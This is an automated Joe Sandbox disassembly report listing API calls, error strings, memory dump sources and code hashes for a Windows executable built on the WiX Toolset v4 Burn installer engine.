                                                                                                                                                                  • Instruction Fuzzy Hash: 4E112372B4032C77E720AA158C4AFEF72AC9B44B64F010161FD55FB3C2E6A4ED8186E0
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 0093156F, 0093187F
                                                                                                                                                                  • ALL, xrefs: 00931581
                                                                                                                                                                  • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 009315A3
                                                                                                                                                                  • Failed to check the dictionary of ignored dependents., xrefs: 00931711
                                                                                                                                                                  • Failed to add the package provider key "%ls" to the planned list., xrefs: 0093186D
                                                                                                                                                                  • Failed to build the list of ignored dependents., xrefs: 0093155D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
                                                                                                                                                                  • API String ID: 0-71972248
                                                                                                                                                                  • Opcode ID: 0b4f0b78751e74cd0ee8010a94a505b77a7890e89daac9a9b13a47ad5709b738
                                                                                                                                                                  • Instruction ID: 5074510d7fa71483d91f41b8e26a2f1f6b188e2c64402935e6595fde5a6cbd94
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4f0b78751e74cd0ee8010a94a505b77a7890e89daac9a9b13a47ad5709b738
                                                                                                                                                                  • Instruction Fuzzy Hash: F8C19871D00204DFEB20CFA4C885BAAB7F9FF98319F14452EE51A67261D7B09881CF54
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,0000000C), ref: 0097BA96
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,0000000C,?), ref: 0097BAA8
                                                                                                                                                                  Strings
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0097BAF3
                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 0097BA7F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ
                                                                                                                                                                  • API String ID: 1772835396-395410266
                                                                                                                                                                  • Opcode ID: 0a7583875e1d81023e66de5bb54e91d1ea59ed2521f2c4ead44802024648a212
                                                                                                                                                                  • Instruction ID: 745225bf695ad5666721e776877d166469d4e56d54c113b4edfc0e53f6b7b65f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a7583875e1d81023e66de5bb54e91d1ea59ed2521f2c4ead44802024648a212
                                                                                                                                                                  • Instruction Fuzzy Hash: BC210CA2900128EADB20DBA98C05FBFB3FDEB8C711F004456F945D6080E638AE80D770
                                                                                                                                                                  APIs
                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00949898,00000000,00000003), ref: 00949910
                                                                                                                                                                  • GetLastError.KERNEL32(?,00949898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094991A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ChangeConfigErrorLastService
                                                                                                                                                                  • String ID: Failed to set service start type.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                  • API String ID: 1456623077-1893245463
                                                                                                                                                                  • Opcode ID: 6b261ed2c1317f1223c8f908dc8454c0a5c8f8d9921cef91b1899ec820ccd0f0
                                                                                                                                                                  • Instruction ID: 3ee0a8a30545921d3e1f643ac443fd8ba6b5a298289b4c289b761778594f5bf6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b261ed2c1317f1223c8f908dc8454c0a5c8f8d9921cef91b1899ec820ccd0f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0E933A4513933D731254A5C49FAF7E5CDB46BB1F114329BE68FA2D1E5618C4092F0
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0097C546
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0097C561
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 401686933-2746444292
                                                                                                                                                                  • Opcode ID: 3be5f92f257beae2850ec8b6198e6fb575d5800a1b7244d84d58bb94ea0bfb9a
                                                                                                                                                                  • Instruction ID: 6a60696ae0492131aaefc7deacc65115a3033efab9728fa2fd3b5f39b31ccc6e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3be5f92f257beae2850ec8b6198e6fb575d5800a1b7244d84d58bb94ea0bfb9a
                                                                                                                                                                  • Instruction Fuzzy Hash: B501D473A141096BDB14DE29DC05BED7BAEAFC8324F08C164BD5DDB144E634E9418680
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00916305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
                                                                                                                                                                    • Part of subcall function 00916305: GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092ED2D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed create acquisition folder., xrefs: 0092ED04
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092ED16
                                                                                                                                                                  Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CreateDecryptDirectoryErrorFileLast
• String ID: Failed create acquisition folder.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 4153065963-4185204549
• Opcode ID: a9210808fae0667e0624153e7ef8c50d202133a662fbfae61efeeb236e681ca1
• Instruction ID: 40f6c957b1c16fa40142e53ed01ca9a2affffd5322b9fd104dc1ad277866032b
• Opcode Fuzzy Hash: a9210808fae0667e0624153e7ef8c50d202133a662fbfae61efeeb236e681ca1
• Instruction Fuzzy Hash: 38E0D83278422973D6212659EC07FCAFA08EFA0F61F000122F708A52E1D6E0786047E1
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0095D4E6
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0095D4F0
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0095D4FD
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 5ce34c8e91056baca0f4505c6d825a833c1231b72409de79724b711902b6051e
• Instruction ID: fd477b83b337738dfb23a25c4191f3c7cd9fe57811e620839fa570a185d1dfe3
• Opcode Fuzzy Hash: 5ce34c8e91056baca0f4505c6d825a833c1231b72409de79724b711902b6051e
• Instruction Fuzzy Hash: A831E37590522C9BCB21DF65D889B8DBBB8BF48311F5041EAE80CA72A0E7709F858F44
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,feclient.dll,?,00000008,?,?,00969393,0097E878,?,00000008,?,?,00968F96,00000000), ref: 009695C5
Strings
Similarity
• API ID: ExceptionRaise
• String ID: feclient.dll
• API String ID: 3997070919-3074931424
• Opcode ID: 33439d9adf3accd3e904e4a4f3d9e649126f9813de63dbda50494e823e867147
• Instruction ID: fcb3e26ec045160c815e0d1810f7afd7f3de99e2af4d266ae5df62991183ab32
• Opcode Fuzzy Hash: 33439d9adf3accd3e904e4a4f3d9e649126f9813de63dbda50494e823e867147
• Instruction Fuzzy Hash: 02B16F31210609DFD715CF28C48AB657BE8FF45364F258699E8DACF2A1C735E992CB40
APIs
  • Part of subcall function 0096B523: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,0096B4C2,?), ref: 0096B5EF
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0096B4E6
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0096B4F7
Similarity
• API ID: AllocateCheckCloseInitializeMembershipToken
• String ID:
• API String ID: 2114926846-0
• Opcode ID: c043fa63816e49da097d9d43b8a1d0b537132726706ea4a83504b5c71ce15271
• Instruction ID: 0516f43263feebc263dbd614c8d2e3144efa142d8375c1be90851e8dc2ed9a76
• Opcode Fuzzy Hash: c043fa63816e49da097d9d43b8a1d0b537132726706ea4a83504b5c71ce15271
• Instruction Fuzzy Hash: D0115BB190021AAFDF20DFA4CC85BAFB7FCFF08344F500829A546E6181E7709A84DB61
APIs
• FindFirstFileW.KERNEL32(00916DEA,?,00916DEA,00916DEA,00000000), ref: 00973476
• FindClose.KERNEL32(00000000), ref: 00973482
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 45fe4095ca4a797b0657f98d24899d170b890e4cbb4239eb2e7dbc51134e6bec
• Instruction ID: f41f6d77e3e50e581993ac9e9842e6e47dac27bef091334be175fb76a4e83124
• Opcode Fuzzy Hash: 45fe4095ca4a797b0657f98d24899d170b890e4cbb4239eb2e7dbc51134e6bec
• Instruction Fuzzy Hash: 2401F972600208ABDB10EF6ADD89DABB7ACEFC5315F004155F81CD3150C6349E8D8750
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0095726B
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 94125615471e52abe2a90bcc9fdd8896d0e4d89722660200e0a8545537c203d8
• Instruction ID: 9dcc9b58ec57330085413140d5e4f57167172777aa30cfa53de61789b4e437de
• Opcode Fuzzy Hash: 94125615471e52abe2a90bcc9fdd8896d0e4d89722660200e0a8545537c203d8
• Instruction Fuzzy Hash: 66515EB1A18215CBDB24CF9AE8857AABBF5FB48315F14846AD805EB360D3749A04DF90
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 8e201d13605a692a08f97bba5d018385cb6a3874acfa587ffe4cd71f75c31314
• Instruction ID: a015332b2a2d9d453883646a13126c8f2ff040d7dc4d50c567b3db0afe5c8f20
• Opcode Fuzzy Hash: 8e201d13605a692a08f97bba5d018385cb6a3874acfa587ffe4cd71f75c31314
• Instruction Fuzzy Hash: 01D102B4A0070A8FCB28CF6AC59167AB7B5FF48312F144A1DED56AB391D330AD49CB40
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00047150,009568C5), ref: 00957147
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0099EC58,000000FF,?,?,?), ref: 00979914
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 00979956
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0097999B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009799E0
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00979A25
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00979A6A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 00979AA7
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00979AE4
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,link,000000FF), ref: 00979B3E
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00979B88
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00979D3A
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                  • String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                  • API String ID: 318886736-3340435141
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009701DE: VariantInit.OLEAUT32(?), ref: 009701F5
                                                                                                                                                                    • Part of subcall function 009701DE: VariantClear.OLEAUT32(?), ref: 00970340
                                                                                                                                                                    • Part of subcall function 009701DE: SysFreeString.OLEAUT32(00000000), ref: 0097034B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,00926624,00000000), ref: 009436DB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,00926624,00000000,?), ref: 009437DB
                                                                                                                                                                    • Part of subcall function 009701DE: SysAllocString.OLEAUT32(?), ref: 0097022F
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: ArpDisplayVersion$ArpId$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$netfx4$none
                                                                                                                                                                  • API String ID: 702752599-1746888974
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0097B1BE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0097B1DD
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
                                                                                                                                                                  • API String ID: 1825529933-1736944660
                                                                                                                                                                  • Opcode ID: 2f2b0182ec879f10667ed5cf25ecf02413837701cc1cd7ecbe2aa160450fc103
                                                                                                                                                                  • Instruction ID: ed5a12deb6ccb1124d59b5f3cd5cb3bf6ddcddfad3ec77abdf9078016ef8fa71
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f2b0182ec879f10667ed5cf25ecf02413837701cc1cd7ecbe2aa160450fc103
                                                                                                                                                                  • Instruction Fuzzy Hash: 5ED10332684305FBDB219F54CC46F5B76A9AB81B24F208615F629BF2D2DBB0E940DB40
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00917D9B,00917DDB,?,009340B9,?,?,00917D5B,?,?,?,?,?,00917D9B), ref: 0091BA98
• LeaveCriticalSection.KERNEL32(00000000,?,009340B9,?,?,00917D5B,?,?,?,?,?,00917D9B), ref: 0091C00D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$numeric$string$version
• API String ID: 3168844106-1770900757
• Opcode ID: 0b53e94a50546d34895528fad26b439ed4f969a6317ad2e411500f24148099e9
• Instruction ID: 462ac316a253d44b61e0b178101172103d8a940dbb2423a43ec6d0ba890bee82
• Opcode Fuzzy Hash: 0b53e94a50546d34895528fad26b439ed4f969a6317ad2e411500f24148099e9
• Instruction Fuzzy Hash: C9F1F836B8421CFBDB11AA54CC06FEF767AAFC8B14F210054F6147B2D1D7B59A819B90
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 0097A40F
• SysFreeString.OLEAUT32(00000000), ref: 0097A6E8
Strings
• Failed to allocate ATOM link href., xrefs: 0097A46F
• Failed to get child nodes of ATOM link element., xrefs: 0097A5F7
• msasn1.dll, xrefs: 0097A6B6
• version.dll, xrefs: 0097A552
• Failed to process all ATOM link elements., xrefs: 0097A67E
• Failed to parse ATOM link length., xrefs: 0097A4BF
• Failed to allocate ATOM link rel., xrefs: 0097A42D
• Failed to process all ATOM link attributes., xrefs: 0097A5C6
• length, xrefs: 0097A484
• title, xrefs: 0097A4D4
• Failed to allocate ATOM link value., xrefs: 0097A6C2
• crypt32.dll, xrefs: 0097A45F
• href, xrefs: 0097A442
• Failed to parse unknown ATOM link element: %ls, xrefs: 0097A692
• comres.dll, xrefs: 0097A49E
• type, xrefs: 0097A512
• Failed to allocate ATOM link title., xrefs: 0097A4FD
• Failed to parse unknown ATOM link attribute: %ls, xrefs: 0097A5B0
• rel, xrefs: 0097A403
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A3CD, 0097A6A1, 0097A6D1
• msi.dll, xrefs: 0097A624
• Failed to allocate ATOM link type., xrefs: 0097A53B
• Failed get attributes for ATOM link., xrefs: 0097A3BE
Similarity
• API ID: String$CompareFree
• String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
• API String ID: 3589242889-4187876800
• Opcode ID: 75dc89715144cffb9e1d223083684951c5a08b63b91dc4c31c233ad9f25a1532
• Instruction ID: f4ed9fc9232343705e1e1f8aa3a9bcd41910812531e9ca555109ac54f95b755f
• Opcode Fuzzy Hash: 75dc89715144cffb9e1d223083684951c5a08b63b91dc4c31c233ad9f25a1532
• Instruction Fuzzy Hash: 7BB1E473A40208FBDF119B90CC4AFAF7B79EBC5B14F158055F608AB190EBB09A41EB55
APIs
• CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,000000F8,00000001,00000000,000000F8,00000024,?), ref: 0097364E
• GetLastError.KERNEL32 ref: 0097365C
• GetLastError.KERNEL32 ref: 0097366E
Strings
Similarity
• API ID: ErrorLast$CreateFile
• String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 1722934493-3998981784
• Opcode ID: 10738f63e49e004ba61fadf6ca7fcded37a1be803d9b478573973c11c6a99184
• Instruction ID: 7b6d0e2ab2eaa67a5c51922b21c086b73dfc546e393d02350fab2758a947d0b4
• Opcode Fuzzy Hash: 10738f63e49e004ba61fadf6ca7fcded37a1be803d9b478573973c11c6a99184
• Instruction Fuzzy Hash: 2DC10073B40319BBEB205A548C4BFFF7568AF84B54F11C518BA09BB2C1E6F48E4066E0
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?), ref: 0092B729
• GetLastError.KERNEL32 ref: 0092B737
• Sleep.KERNEL32(00000064), ref: 0092B75B
Strings
Similarity
• API ID: CreateErrorFileLastSleep
• String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent logging pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
• API String ID: 408151869-3514438494
• Opcode ID: 2c92ab3f6b6d2157ad90c7a47861fdbce6bf59ac5e9ccb3091be57e86f4a382e
• Instruction ID: b251839d0c62c6af6e428286fb3f20b0ae9902af59611a1a5df0f0823938fa59
• Opcode Fuzzy Hash: 2c92ab3f6b6d2157ad90c7a47861fdbce6bf59ac5e9ccb3091be57e86f4a382e
• Instruction Fuzzy Hash: 34712A36E81735B7E72166509C0AFAE6AAC9F44B24F110211FF14FA2D4D3B89D9097D1
APIs
• GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00949AD9
  • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
  • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
  • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
• CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00949DF5
